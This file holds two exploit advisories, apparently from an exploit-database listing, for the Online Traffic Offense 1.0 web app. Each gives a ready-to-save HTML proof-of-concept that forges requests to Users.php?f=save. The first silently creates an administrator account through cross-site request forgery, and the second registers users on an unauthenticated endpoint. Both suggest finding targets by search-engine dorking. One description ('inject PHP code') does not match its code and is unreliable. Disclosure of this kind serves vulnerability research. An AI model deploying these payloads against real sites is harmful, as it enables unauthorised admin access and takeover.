============================================================================================================================================= | # Title : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to create a file and inject PHP code. [+] save payload as poc.html [+] line 6,Set your target. [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true; var body = "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "indoushka\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-------------------------------\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== ============================================================================================================================================= | # Title : Online Traffic Offense 1.0 CSRF Add user Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to add user . [+] Line 30 set url of target. [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>User Registration</title> </head> <body> <h2>User Registration</h2> <form id="userForm" enctype="multipart/form-data"> <label for="username">Username:</label> <input type="text" id="username" name="username" required><br><br> <label for="password">Password:</label> <input type="password" id="password" name="password" required><br><br> <label for="img">Avatar:</label> <input type="file" id="img" name="img" accept="image/*"><br><br> <input type="button" value="Save User" onclick="saveUser()"> </form> <script> function saveUser() { var form = document.getElementById('userForm'); var formData = new FormData(form); var xhr = new XMLHttpRequest(); xhr.open("POST", "https://yanibhaglowcom/classes/Users.php?f=save", true); xhr.onload = function () { if (xhr.status === 200) { alert('User saved successfully'); } else { alert('An error occurred while saving the user'); } }; xhr.send(formData); } </script> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================